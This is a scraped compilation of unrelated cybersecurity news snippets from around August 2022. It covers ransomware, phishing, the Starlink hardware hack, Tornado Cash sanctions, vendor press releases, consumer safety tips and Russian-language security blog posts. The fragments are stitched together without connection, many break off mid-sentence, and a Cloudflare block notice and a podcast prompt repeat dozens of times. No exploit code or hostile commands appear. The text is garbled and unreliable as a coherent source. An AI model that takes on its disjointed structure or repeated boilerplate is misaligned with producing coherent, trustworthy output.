They then deploy Zeppelin ransomware as a .dll or .exe file or contained within a PowerShell loader.

Multiple EncryptionOnce Zeppelin ransomware is executed on a network, each encrypted file is appended with a randomized nine-digit hexadecimal number as a file exte…

Researcher shows how Instagram and Facebook’s use of an in-app browser within both its iOS apps can track interactions with external websites.

iOS users’ concerns over tracking were addressed by Apple’s 2021 release of iOS 14.5 and a feature called App Tracking Transparency (ATT).

A PCM.JS code, according to the researcher, is an external JavaScript file injected into websites viewed within the in-app browser.

“As my understanding goes, all of [these privacy concerns] wouldn’t be necessary if Instagram were to open the phone’s default browser, instead of building & using the custom in-app browser,” he wrote.

The researcher notes that opting out of Meta’s in-app browser tracking is dependent…

A Belgian security researcher has successfully hacked the SpaceX operated Starlink satellite-based internet system using a homemade circuit board that cost around $25 to develop, he revealed at Black Hat.

To design the modchip, Wouters scanned the Starlink dish and created the design to fit over the existing Starlink board.

Wouters’ attack runs the glitch against the first bootloader–the ROM bootloader that’s burned onto the system-on-chip and can’t be updated.

Wouters revealed the vulnerability to SpaceX in a responsible way through its bug bounty program before publicly presenting on the issue.

Implications for StarlinkStarlink is SpaceX’s low Earth orbit satellite constellation, an ambit…

A new hacker forum is taking a unique political stance to support Ukraine in its war with Russia, entertaining only topics and threat activity focused against Russia and Belarus, researchers have found.

A closer look at the forum revealed its unique ideology to take a firm political stance to support Ukraine as it defends itself against Russia’s invasion, “the only forum we’re aware of that is taking such a stance,” researchers wrote.

Unabashed Support for UkraineIts pro-Ukrainian stance puts DUMPS Forum in a unique position, but also points a target on its back, researchers said.

“If the forum develops into a well-known and successful project, it will likely become a target of counter acti…

Cisco Systems revealed details of a May hack by the Yanluowang ransomware group that leveraged a compromised employee’s Google account.

The networking giant is calling the attack a “potential compromise” in a Wednesday post by the company’s own Cisco Talos threat research arm.

“Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account.

The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account,” wrote Cisco Talos.

Cisco Highlights its Incident ResponseIn response to the attack, Cisco implemented a company-wide p…

And I think that’s where the expectation comes in, of what threats are you actually facing as an organization?

I think the difficulty with MFA is too many organizations think I have MFA therefore I am secure, and that’s the end of the journey for them.

But then the third part about it, now, when users configure a way to absorb the MFA, they’re almost acting as a role of almost internal hackers, because they have to get their jobs to do so.

JE: And I think that’s that’s a key now, before we let you go today Jack, I have one final question for you, and it’s how do you see toolkits and attacks evolving in the future.

JE: But I think it’s you know, one of those things that we definitely need to…

Microsoft is urging users to patch a zero-day vulnerability dubbed Dogwalk that is actively being exploited in the wild.

Dogwalk Flaw Was Over Two-Years OldThe actively exploited Dogwalk bug was first reported to Microsoft in January 2020 by researcher Imre Rad.

However, it wasn’t until a separate researchers began tracking the exploitation of a flaw dubbed Follina (CVE-2022-30190) that the Dogwalk bug was rediscovered.

This is the fourth month in a row that Microsoft has deployed a critical NFS code execution patch.

Interestingly, Microsoft describes the flaw as Important, while researchers warn the bug is Critical and should be a priority patch.

U.S. Treasury blocked the business of the virtual currency mixer for laundering more than $7 billion for hackers, including $455 million to help fund North Korea’s missile program.

The U.S. government has slapped sanctions on virtual currency mixer Tornado Cash for laundering more than $7 billion in crypto cash derived from cybercriminal activity.

At least $455 million of that was moved for state-sponsored Lazarus Group in part to help fund North Korea’s missile program, officials said.

The OFAC already sanctioned the group and all its sub-entities in 2019 for their various cybercriminal actions to support North Korea’s weapons programs.

While Tornado Cash purports to maintain anonymity for…

Attackers are using emails that spoofed the popular cryptocurrency exchange to trick users into logging into their accounts so they could gain access to them and steal victim funds, researchers from PIXM Software have found.

Phishing for Account TakeoverThe attacks begin with actors targeting Coinbase users with a malicious email that spoofs the currency exchange so potential victims think it’s a legitimate message.

This is when threat actors employ 2-factor relay in the attack structure to get around the MFA built into the Coinbase platform, researchers said.

Once the user enters the 2FA code into the fake website, the attacker immediately receives it and logs into the legitimate account, …

]com open redirect vulnerability in 6,812 phishing emails originating from various hijacked accounts, they said.

]com open redirect vulnerability in 2,029 phishing emails that originated from newly created domains.

The phishing emails in the Snapchat open redirect group impersonated DocuSign, FedEx and Microsoft, and all had snapchat open redirects that led to Microsoft credential harvesting sites, researchers said.

The open redirect bug on the American Express domain also appeared unpatched at first, he said.

When the phishing campaign using it first started, the open redirect link went to Microsoft credential harvesting sites, researchers observed.

It’s not my intention to be alarmist about the Log4j vulnerability (CVE-2021-44228), known as Log4Shell, but this one is pretty bad.

How prevalent is Log4j in business systems?

The top action is to understand the extent of the problem by identifying which of your assets use the Log4j software and then apply an appropriate patch.

This is where the efficacy of your security tools is put to the test.

How Effective Are Your Security Tools?

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Don’t worry, elections are safe.

Scattered around a bevy of tables in the election hacking village here at DEF CON 30 are all the devices – opened wide – that are supposed to keep elections safe.

Here, equipment manufacturers have been resistant at best to security researchers, litigious at worst.

Even at DEF CON, in the car hacking village, there are manufacturers willing to dialog.

Not that DEF CON is really filled with researchers – more like curious hackers-in-training looking at shiny, digital things.

SMTP email and SPF overviewReaders familiar with SMTP message sending mechanisms and how SPF interacts with them might prefer to skip this section, although it is mercifully short.

Imagine that Alice at example.com wishes to send an email message to Bob at example.org.

According to one study published in 2022, around 32% of the 1.5 billion domains investigated had SPF records.

Uptake of SPF has been slow and flawed indeed, which might lead to another question: how many domains have overly permissive SPF records?

After this experiment, I notified Prudence Créole and Wild Voyager about their misconfigured SPF records.

A presentation in the Black Hat US 2022 schedule by Stacy Rioux, Ph.

When there is such a huge shortage of talent in the cybersecurity industry, those who are on the frontline are potentially prone to suffering burnout.

Unfortunately, the presentation was light on example, and was more a presentation on the issue of burnout, rather than identifying and mitigating it in cybersecurity settings.

These requirements are potentially, at least a contributor, to blame for the unfilled cybersecurity positions.

Normalizing cybersecurity in this way would, hopefully, avoid the shortage of talent tomorrow, and importantly the burnout of those who choose a career in cybersecurity.

Windows used to be the big talking point when it came to exploits resulting in mass casualties.

Nowadays, talks turned to other massive attack platforms like #cloud and carsIn years past, a massive Windows exploit netted mass casualties, but here at Black Hat, talks turned toward other massive attack platforms like clouds and cars.

If you can find a cloud exploit like one presented here on multi-tenant cloud platform database hacks, one user can slurp up data from another company with a few commands.

That’s plenty of time for a single exploit to wipe out many companies.

Windows crowded the stage for quite a long time here at Black Hat, but now there’s competition, the scary, fast-spreading …

The NHS was victim of a potential cyberattack, which raises the question of the impact of those data breach for the public.

This week, the NHS was potentially affected by a ransomware attack, which raise the question: Why should you care if your data my have been stolen during a breach?

Also, if you are looking for romance and love online, learn the red flags and the steps to protect yourself from romance scammers.

Watch the video to learn more.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

Our Security evangelist’s take on this first day of Black Hat 2022, where cyberdefense was on every mind.

But, there is one standout moment of the day for me, a simple moment when all the mentions of Ukraine and the detailed analysis of the cyberincidents the country has endured was put in perspective.

SentinelOne’s Juan Andres Guerrero and Thomas Hegel presented Real ‘Cyber War’: Espionage, DDoS, Leaks, and Wipers in the Russian Invasion of Ukraine, a detailed timeline of the cyberattacks relating to the conflict.

A slide calling out the main contributors listed them as: CERT-UA, United States Cyber Command, Cybersecurity and Infrastructure Security Agency (CISA), SentinelLabs, Microsoft T…

Tinder, Bumble or Grindr – popular dating apps depend heavily on your location, personal data, and loose privacy settings.

While dating apps depend heavily on your location, personal data, and loose privacy settings, there’s some tweaking that can be done.

A lot of it will be like doing acrobatics to get the right balance between safety, privacy, and usability.

We list below some of the most popular dating apps and how to leverage their features to improve safety.

The app’s AI will compare it with your profile pictures and confirm your identity.

Last week, at ChannelCon in Chicago, I participated on a panel titled ‘Building trust in a Zero Trust world’ with several other industry experts.

The core concept of Zero Trust is ‘trust nothing, verify everything’ and for many in the cybersecurity industry this has been the mantra we have lived by for our whole careers.

And, throughout my career there have been many terms and acronyms used in the information technology industry that have proved to be ‘for the moment’ or ‘fashionable’, the term Zero Trust does not fall into this group.

The lack of trust in this bleeding edge project caused a zero-trust attitude, ‘trust nothing and verify everything’, and then, when possible, ‘verify it agai…

Read on for ten signs your PC has been hacked and handy tips on how to fix it.

Slow-running machines can be the result of non-malicious factors, such as poor PC hygiene, but it’s best to check to see if there’s anything untoward going on.

If you spot any that you don’t recognize or can’t remember downloading, it could means your PC has been hacked.

Check the message is coming from your legitimate computer security software vendor and then follow the instructions to try to find and delete the malicious files on your PC.

Don’t assume that the warning means the security software tool will automatically purge the PC of that specific threat.

Learn the basics of zero-trust, and how building a zero-trust environment can protect your organization.

This week, ESET’s security evangelist Tony Anscombe participated in a panel on zero-trust architecture during ChannelCon.

He explains what zero-trust means, and the basic practises any organisation should implement to protect themselves.

Watch the video to learn more.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

“It’s a match” is now a common expression in the dating scene, and “I’m on Tinder” is synonymous for “dating and available”.

With 75 million active users monthly users and 10.6 million subscribers, Tinder recorded over 70 billion matches in 10 years that led to 1.5 million dates per week.

CatfishingSometimes scammers don’t want your money; instead, they might want your attention or company.

The difference is that while we want to charm those we’re going out with, the real scammers want to harm us.

If you decide to move the conversation to another app, such as WhatsApp, don’t send pictures of yourself that might be misused.

Doing so will take users to a spoofed site requesting that they fill in personal information (like logins and/or address/financial details) or could trigger a covert malware download.

Drive-by downloads and malicious ads: Sometimes merely visiting an infested website or a site running a malicious ad could trigger a malware download.

That’s why its essential to invest in security software from a reputable provider and ensure that your browser’s security settings are correct.

That’s why it makes sense to download only from trusted sources, and to use an effective security software tool to scan for malicious software.

Check beforehand if you don’t recognize any software to ensure removing it w…

Cybercriminals exploited a vulnerability to steal the equivalent of 18M$ from the NFT music streaming platform Audius, while other cyberthreats related to crypto makes the news.

This week, the NFT music streaming platform Audius was the victim of a cyberattack.

Criminals exploited a vulnerability to steal the equivalent of 18M$ from the platform.

Recent data show the growing impact of crypto laundering, payments request from ransomware group in cryptocurrencies, and so on.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

Learn to spot some of the threats that you can face while browsing online, and the best tips to stay safe on the web.

Over the years they’ve become a repository of credentials, cookies, web searches, and other juicy information that could be targeted by cybercriminals.

But let’s not forget the large amounts of data that internet providers, websites, and advertisers collect on visitors every day as they browse the web.

How to browse the web more securelyThere’s plenty that users can do to mitigate security and privacy risks when browsing the web.

And don’t hand over any sensitive informationto reduce the risk of browser threats that travel via email and online messages.

Super Cash App Friday impersonatorsThe weekly cash giveaway event on the platform’s Instagram and Twitter accounts has, predictably, been hijacked by fraudsters.

Cash flippingThe Cash App Friday/$Cashtag scam is sometimes a premise for another increasingly common type of fraud leveraging the service.

Fake Cash App receiptsScammers claim that they’ve sent money to a victim’s Cash App account by accident and ask them to return the amount.

By configuring the most secure settings in the app and treating any unsolicited contact with a healthy dose of skepticism, Cash App users can avoid most of the above scams.

Don’t Google Cash App support: Use the in-app chat function or these official channel…

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

S3 Ep94: This sort of crypto (graphy), and the other sort of crypto (currency!)

[Audio + Text]

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Incident response (IR) in the cloud is far simpler than on-premises incident response.

But for an incident investigation, it’s not enough.

This can be a big problem if you’re investigating a sizeable cloud environment.

Therefore, you need responder accounts for your cloud environment created before an incident begins.

This is because threat actors, like any user, are limited in which actions can take place in a cloud environment.

Daily Newsletter - E-mail sent every business day with a recap of the last 24 hoursWeekly Newsletter - E-mail sent every Monday with a recap of the last 7 days(IN)SECURE Magazine - E-mail sent when a new issue is releasedI have read and agree to the terms & conditions

Mezmo published an ESG report which provides insights on DevSecOps adoption, its benefits, and the challenges with implementation.

“As organizations adopt modern software development processes leveraging cloudplatforms, they are looking to incorporate security processes and controls into developer workflows,” said Melinda Marks, senior analyst at ESG.

“This research shows DevSecOps can be a game changer for companies, and there is no doubt we will see growing market traction over the next few years.”Factors limiting DevSecOps adoption and successAccording to the research, there are distinct differences between the perceived and actual challenges of implementation.

Companies believe that est…

Response-based attacks targeting corporate inboxes have climbed to their highest volume since 2020, representing 41 percent of all email-based scams targeting employees, during Q2 of this year.

From April through June, researchers analyzed hundreds of thousands of phishing and social media attacks targeting enterprises and their employees.

This threat type has seen a 3.4 percent increase in share of reports so far in 2022, and routinely occupies the majority of response-based attacks.

In Q2, social media attacks increased 20 percent from Q1, averaging nearly 95 attacks per enterprise, per month.

Credential theft attacks targeting Office 365 accounts reached a six-quarter high in share and v…

RackWare has released SWIFT for Microsoft Azure, a solution for migrating and protecting stateful containerized workloads running on the Microsoft Azure.

Moving and protecting stateful containerized workloads can be challenging, time consuming and costly.

RackWare SWIFT delivers flexibility in the handling of stateful containerized workloads, as part of any migration or DR transformation to AKS, any source storage type for containers can be transitioned to any of the AKS storage types, including Azure Disk Storage, and Azure File Share.

“We are very excited to offer this solution to migrate and protect stateful containerized workloads with AKS,” said Bryan Gobbett, CEO, RackWare.

“Our stron…

Everbridge has released the full integration of Travel Risk Management (TRM) and Critical Event Management into a single SaaS solution called Everbridge Travel Protector complemented by Everbridge Assist, Powered by Anvil.

“Customers seek one single pane of glass to view and manage critical events, mass notification and travel risk and assistance services.

Everbridge Travel Protector augments the Everbridge CEM platform to offer businesses, healthcare, and government organizations the functionality they require around the unification of travel data, pre-trip travel advisories, granular automated traveler alerting, and dynamic location awareness to keep their people safe wherever they go.

Th…

1Kosmos and Simeio have joined forces to help customers transition from passwords to identity-based verification using the 1Kosmos BlockID platform.

The 1Kosmos platform combines digital identity proofing with biometrics and passwordless authentication while storing user data encrypted in a distributed ledger.

“Simeio is a global leader in solving customers identity challenges and providing managed services for multi-vendor environments,” said Hemen Vimadalal, CEO of 1Kosmos.

“Together we will make passwordless, MFA and identity verification accessible to any size organization even if they lack in-house identity management expertise.”, said Vimadalal.

1Kosmos BlockID is a distributed identi…

Quick Heal Technologies has collaborated with RevBits to address the protection need for an on-premise infrastructure of government organisations.

The partnership will help Quick Heal enhance its Seqrite product portfolio while enabling RevBits to expand its market presence in India.

It also complements our existing suite of Seqrite security solutions and will help us further strengthen our Seqrite product portfolio to offer the best cybersecurity solutions to our customers.

At Quick Heal, we strive to innovate ourselves in sync with the ever-evolving threat landscape and devise solutions that exactly fit this purpose.

The combination of RevBits technology and the reputation and market cove…

IRONSCALES integrated email security and security awareness training solution is needed now more than ever,” said Russell McGuire, CRO of IRONSCALES.

“We are excited to partner with Distology to protect organizations and their employees across the UK and Europe from phishing attacks.”, McGuire continued.

IRONSCALES and Distology’s partnership enables distribution of IRONSCALES’ email security solution to protect organizations from phishing.

IRONSCALES integrated phishing simulation and security awareness training will help IT leaders train employees on how to identify and flag phishing attacks, which reduces overall cybersecurity risk within these organizations.

“IRONSCALES’ email security …

BitSight has appointed Catherine Harrell as Chief Marketing Officer (CMO).

Catherine joins BitSight from Brightly, where she was CMO and a key member of the executive team that achieved revenue growth and profitability during her three-plus year tenure.

“BitSight is transforming how organizations measure and manage cyber risk and Catherine will play an integral part, strengthening and leading the marketing team to bring innovative new analytics and risk quantification capabilities to market.

In her role as CMO, Harrell will drive strategy and execution across all of BitSight’s marketing functions and teams.

“In these times, it is more critical than ever for companies across every industry t…

AuditBoard released its Third-Party Risk Management solution.

In this new era of dynamic digital risk, third-party breaches are now estimated to cost U.S. companies an average of $9.5 million per incident.

Information security, risk management, and compliance teams need the right solution to efficiently evaluate and mitigate third-party risk while managing ever-expanding cybersecurity and compliance obligations.

Working in conjunction with AuditBoard’s innovative and award-winning CrossComply solution, which allows organizations to manage their information security compliance programs at scale, AuditBoard’s Third-Party Risk Management solution empowers teams to manage their overall IT risk …

Acuant has integrated with Ping Identity, leveraging PingOne DaVinci, a no-code identity orchestration service.

Acuant joins a growing network of technology partners developing integrations with PingOne DaVinci through the Ping Identity Global Technology Partner Program.

“We are excited to partner with Ping Identity to empower businesses with the best in fraud-fighting technology.”, Luttrell continued.

AI-powered identity verification, regulatory compliance (AML/KYC) and digital identity solutions deliver accuracy and efficiency that balance security with customer experience.

“Ping Identity is committed to expanding our technology partner ecosystem to deliver better, more frictionless custo…

Daily Newsletter - E-mail sent every business day with a recap of the last 24 hoursWeekly Newsletter - E-mail sent every Monday with a recap of the last 7 days(IN)SECURE Magazine - E-mail sent when a new issue is releasedI have read and agree to the terms & conditions

A recent attack targeting crypto-related users of Mailchimp has ended up affecting users of cloud infrastructure provider DigitalOcean, the latter company has announced on Monday.

“On August 8th, DigitalOcean discovered that our Mailchimp account had been compromised as part of what we suspect to be a wider Mailchimp security incident that affected their customers, targeted at crypto and blockchain.

From that Mailchimp incident, we suspect certain DigitalOcean customer email addresses may have been exposed,” shared Tyler Healy, VP Security at DigitalOcean.

“At 3:30pm ET on August 8th, 2022 transactional emails from our platform, delivered through Mailchimp, stopped reaching our customers’ i…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Месячник молчания закончен - спешу сообщить, что блог переехал на новый домен - lukatsky.ru, где мы с вами и встретимся :-)Тут всем пока, а там всем привет!

И с международным днем защиты информации!!

РКН со своим 1046-м Постановление Правительства по надзору в области персональных данных тоже накосячил - и в расширительном толковании отдельных терминов, и синтаксических ошибках.

И это только три примера, которые достаточно свежие и от разных регуляторов, но их ведь гораздо больше.

Надо сказать, что это не совсем проблема регулятора, что у нас исторически все боятся сказать что-то против политики партии, но и его тоже - он же поощряет ее.

Поэтому только публичная активность, но на это рассчитывать не приходится - не приучен у нас регулятор к публичной критике, а еще и отомстить может.

Пятый вариант заключается в том, чтобы попробовать сферического коня в вакууме в своем загоне, то есть в…

Решил я тут раскрыть чуть больше краткую заметку в своем Telegram, посвященную моделированию угроз в процессе разработки ПО.

Я написал следующее: "Методика оценки угроз ФСТЭК не применяется при моделировании угроз в рамках безопасной разработки.

А, в конце концов, нарушение правил контроля доступа, которое отвечает за 10 из 30 основных проблем безопасности ПО?

Ее, кстати, нет и в текущей методике оценки угроз, что ставить нас перед непростой задачей - какую из актуальных угроз нейтрализовывать первой, какую второй, какую третьей и т.д.

А пока я остаюсь при своем мнении относительно того, что пока у нас нет методики оценки угроз в рамках процесса безопасной разработки.

Обновил и опубликовал на Slideshare свою презентацию про стандарты и руководства по управлению ИБ при взаимодействии с поставщиками. Supply management 1.1.pdf from Andrey Prozorov, CISM

Опубликовал на SlideShare несколько своих старых презентаций по GDPR и Privacy:All about a DPIA - https://www.slideshare.net/AndreyProzorov/all-about-a-dpia-by-andrey-prozorov-20-220518pdfEmployee Monitoring and Privacy - https://www.slideshare.net/AndreyProzorov/employee-monitoring-and-privacypdfGDPR and Personal Data Transfers - https://www.slideshare.net/AndreyProzorov/gdpr-and-personal-data-transfers-11pdfGDPR and Security - https://www.slideshare.net/AndreyProzorov/gdpr-and-securitypdfGDPR RACI - https://www.slideshare.net/AndreyProzorov/gdpr-racipdfGDPR EU Institutions and bodies - https://www.slideshare.net/AndreyProzorov/gdpr-eu-institutions-and-bodiespdf

Я люблю и использую майндкарты уже 15 лет, а недавно обновил свою "Майндкарту о майндкартах", теперь она на английском языке.Скачать ее в PDF и Xmind можно тут - https://www.patreon.com/posts/65251502 или тут - https://boosty.to/isms8020/posts/c69bdcee-f0eb-48be-ab4a-29b1f84d1996А посмотреть прошлый вариант на русском языке тут - https://80na20.blogspot.com/2012/07/blog-post_10.html

На днях вышло официальное обновление стандарта ISO 27001, ISO/IEC 27001:2013/DAmd 1(en) Information technology — Security techniques — Information security management systems — Requirements — AMENDMENT 1. Теперь у нас новый список контролей (мер ИБ) в приложении А, теперь он выровнен с обновленным стандартом ISO 27002:2022, который мы также ожидаем со дня на день.Общее количество контролей сокращено до 93 (в основном путем объединения), добавлено 11 новых:5.7 Threat intelligence5.23 Information security for use of cloud services5.30 ICT readiness for business continuity7.4 Physical security monitoring8.9 Configuration management8.10 Information deletion8.11 Data masking8.12 Data leakage pre…

ISO опубликовала свежие данные по сертификации систем менеджмента (ISO Survey), из которых меня особенно интересует статистика по СУИБ (ISO 27001). The ISO Survey results contain three sets of data:the number of valid certificates for each country for the 12 ISO management system standards,the number of sites covered by the certificates for each country for 12 ISO management system standards,the number of sectors per country covered by the certificates for 10 ISO management system standards (ISO 22000 and ISO 13485 do not contain data on sectors).Общее количество сертификатов на конец 2020 года:По ISO 27001 рост на 22%.Топ 10 стран, по количеству выданных сертификатов:В РФ 90/252 (рост за г…

​​Сегодня частично затронем тему EndpointSecurity и поговорим про инструмент osquery. Исторически osquery сделали инфраструктурщики в Facebook, под свои задачи еще в 2013, а после публикации в опенсорс он завоевал сердечки и остальных.Эта штука способа превратить ОС в реляционную базу данных, а вас вооружить всей мощью SQL чтобы с этими данными работать.Глянуть историю процессов в динамике, найти стремные файлы используя YARA-правила или отобразить открытые порты — проще простого, собрать все недавние http запросы, включая JA3 от TLS — изи, нужно что-то посложнее? На самом деле все ограничивается вашей фантазией потому что у osquery есть свой SDK и возможность подключения расширений, написа…

Ого, а вы наверное и забыли, что подписаны на этот канал?Судя по датам последних публикаций канал перешел в режим один пост в пол года. Причины этому максимально банальны — большое кол-во работы и как следствие частичная потеря интереса к ИБ. Как там это сейчас называется, выгорание?За последний год удалось позаниматься интереснейшими проектами, задачами, пообщаться с крутыми специалистами и восстановиться.Лишний раз убедился, что в ИТ и ИБ огромное количество талантливых и умных людей, которые вне публичного поля и просто тихо делают свою работу, делают ее по-настоящему!Еще нужно сказать, что очень важно уметь делать перерывы и успевать просто пожить.Основная идея этого лиричного текста в …

Застрахуй братуху, застрахуй или зачем вам ИБ, если можно просто купить полис?https://cloud.yandex.ru/insurance-offerhttps://sber.insure/products/cyber/Судя по количеству материалов по запросу "cybersecurity insurance" за рубежом это уже частая практика, посмотрим приживется ли у нас. Любопытно глянуть на реальные кейсы.p.s ого первый пост с лета :0

This is more of a demonstration than a real-world vulnerability, but researchers can use electromagnetic interference to remotely control touchscreens.

From a news article:It’s important to note that the attack has a few key limitations.

Firstly, the hackers need to know the target’s phone passcode, or launch the attack while the phone is unlocked.

Secondly, the victim needs to put the phone face down, otherwise the battery and motherboard will block the electromagnetic signal.

Thirdly, the antenna array has to be no more than four centimeters (around 1.5 inches) away.

$23 Million YouTube Royalties ScamScammers were able to convince YouTube that other peoples’ music was their own.

While the size of the heist and the breadth of the scheme may be very unique, it’s certainly a situation that many YouTube content creators have faced before.

YouTube’s Content ID system, meant to help creators, has been weaponized by bad faith actors in order to make money off content that isn’t theirs.

YouTube attempts to be cautious with who it provides CMS and Content ID tool access because of how powerful these systems are.

And it seems like thieves are doing the same, falsifying documents to gain access to these YouTube tools through these third parties that are “trusted” …

Upcoming Speaking EngagementsThis is a current list of where and when I am scheduled to speak:I’m speaking as part of a Geneva Centre for Security Policy course on Cyber Security in the Context of International Security, online, on September 22, 2022.

I’m speaking at IT-Security INSIDE 2022 in Zurich, Switzerland, on September 22, 2022.

The list is maintained on this page.

Posted on August 14, 2022 at 12:04 PM • 0 Comments

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Twitter Exposes Personal Information for 5.4 Million AccountsTwitter accidentally exposed the personal information—including phone numbers and email addresses—for 5.4 million accounts.

In January 2022, we received a report through our bug bounty program of a vulnerability in Twitter’s systems.

This comment has it right:So after forcing users to enter a phone number to continue using twitter, despite twitter having no need to know the users phone number, they then leak the phone numbers and associated accounts.

That isn’t just one bug causing a security leak—it’s a chain of bad decisions and bad security culture, and if anything should attract government fines for lax data security, this is …

